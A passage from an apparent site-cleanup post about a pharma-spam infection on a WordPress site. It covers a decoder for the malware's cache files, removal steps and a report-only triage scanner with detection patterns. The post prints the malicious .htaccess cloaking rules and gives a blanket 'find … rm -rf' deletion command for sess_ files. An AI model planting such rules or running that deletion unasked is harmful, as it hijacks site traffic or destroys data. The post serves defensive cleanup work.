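           "bot_masks": ["^66\\.249\\."],
           "traf_urls": {},
           "landing": {"headers": {}, "content": "<html>landing</html>"}}
    db = {"/cheap-viagra/": {"headers": {}, "content": "<html>spam page</html>"}}
    idx_bytes = xor_data(php_serialize(idx), idx_path.encode())
    comp = zlib.compressobj(wbits=-15)
    db_bytes = comp.compress(php_serialize(db)) + comp.flush()
    return idx_bytes, db_bytes


if __name__ == "__main__":
    idx_path, db_path = sess_names("www.example.com", "wp-content/uploads")
    idx_bytes, db_bytes = make_sample(idx_path)
    print("idx:", decode_idx(idx_bytes, idx_path))
    print("db:", decode_db(db_bytes))
```

When decoding files taken from a real server, pass decode_idx() the path string exactly as the loader built it (temp dir from its list, relative to the document root, or the absolute sys_get_temp_dir() path), not the location you copied the file to; with the wrong key the unserialize step fails immediately.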

Recommended action:
Back up the website files and database before doing anything.

Obviously, remove the infected files from your server. Also remove the following block of rewrite rules from your .htaccess file:

RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} (google|yahoo|bing) [OR]
RewriteCond %{HTTP_REFERER} (google|aol|yahoo|bing)
RewriteCond %{REQUEST_URI} /$ [OR]
RewriteCond %{REQUEST_FILENAME} (html|htm|php)$ [NC]
RewriteCond %{REQUEST_FILENAME} !common.php
RewriteCond %{DOCUMENT_ROOT}//common.php -f
RewriteRule ^.*$    //common.php [L]

It is also recommended to look for other occurrences of the following text in your .htaccess file:

%{HTTP_USER_AGENT} (google|yahoo|bing)

Then remove them and the corresponding files.

Also remove the idx and db files:

find . -type f -name "sess_*" -exec rm -rf {} \;
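As an added triage script (written for this note, not from the post) that turns the cleanup steps above into a report: it walks a web root and flags .htaccess files carrying the rewrite condition quoted above, common.php files that use the obfuscated loader's 'string'^'string' idiom, and sess_ files, distinguishing the two names the decoded loader derives from md5(host.'idx') and md5(host.'db') from other 26-hex-character candidates. It only reports; deleting is left to you after the backup the post recommends. build_sample_webroot() creates a constructed tree in a temp directory, with an inert common.php and empty sess_ files, purely to exercise the scanner; the host name example.com is an assumption.

```python
import hashlib
import re
import tempfile
from pathlib import Path

# Indicators taken from the post: the rewrite condition added to .htaccess, the
# string-XOR idiom of the obfuscated common.php loader, and the sess_<26 hex>
# names the decoded loader derives from md5(host . 'idx') / md5(host . 'db').
HTACCESS_COND = re.compile(r"%\{HTTP_USER_AGENT\}\s*\(google\|yahoo\|bing\)")
HTACCESS_RULE = re.compile(r"RewriteRule\s+\^\.\*\$\s+//common\.php")
XOR_LOADER = re.compile(r"\$\w+\s*=\s*'[^']*'\^'[^']*';")
SESS_NAME = re.compile(r"^sess_[0-9a-f]{26}$")


def expected_sess_names(http_host: str) -> set:
    """The exact idx/db basenames the loader would create for this host."""
    short_host = re.sub(r"^www\.", "", http_host)
    return {"sess_" + hashlib.md5((short_host + tag).encode()).hexdigest()[:26]
            for tag in ("idx", "db")}


def scan_webroot(root, http_host: str) -> list:
    """Return sorted (finding, relative path) pairs; nothing is modified."""
    root = Path(root)
    exact = expected_sess_names(http_host)
    findings = []
    for path in root.rglob("*"):
        if not path.is_file():
            continue
        rel = path.relative_to(root).as_posix()
        if path.name == ".htaccess":
            text = path.read_text(errors="replace")
            if HTACCESS_COND.search(text) or HTACCESS_RULE.search(text):
                findings.append(("htaccess-rewrite", rel))
        elif path.name == "common.php":
            head = path.read_bytes()[:4096].decode("latin-1")
            kind = "obfuscated-loader" if XOR_LOADER.search(head) else "common.php-review"
            findings.append((kind, rel))
        elif path.name in exact:
            findings.append(("sess-cache-match", rel))
        elif SESS_NAME.match(path.name):
            findings.append(("sess-cache-candidate", rel))
    return sorted(findings)


def build_sample_webroot(http_host: str = "www.example.com") -> Path:
    """Constructed sample tree mirroring the post's findings; contains no malware."""
    root = Path(tempfile.mkdtemp(prefix="pharma-sample-"))
    uploads = root / "wp-content" / "uploads"
    uploads.mkdir(parents=True)
    (root / "tmp").mkdir()
    (root / ".htaccess").write_text(
        "RewriteEngine On\n"
        "RewriteCond %{HTTP_USER_AGENT} (google|yahoo|bing) [OR]\n"
        "RewriteCond %{HTTP_REFERER} (google|aol|yahoo|bing)\n"
        "RewriteRule ^.*$    //common.php [L]\n")
    # Inert stand-in for the loader: only the 'str'^'str' idiom, no payload.
    (uploads / "common.php").write_text("<?php /*constructed*/ $a='abc'^'def'; ?>\n")
    (root / "index.php").write_text("<?php echo 'clean site';\n")
    for name in expected_sess_names(http_host):
        (uploads / name).write_bytes(b"\x00" * 8)               # exact-name matches
    (root / "tmp" / ("sess_" + "a" * 26)).write_bytes(b"\x00")   # same shape, other host
    (root / "tmp" / ("sess_" + "b" * 32)).write_bytes(b"\x00")   # 32 chars: ignored
    return root


if __name__ == "__main__":
    sample = build_sample_webroot()
    for kind, rel in scan_webroot(sample, "www.example.com"):
        print(f"{kind:22} {rel}")
```

Run it against a copy of the site with the real host name; sess-cache-match entries are the idx/db pair for that host, while sess-cache-candidate entries need a look (another virtual host served from the same tree, or an unrelated file of the same shape) before they are removed.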
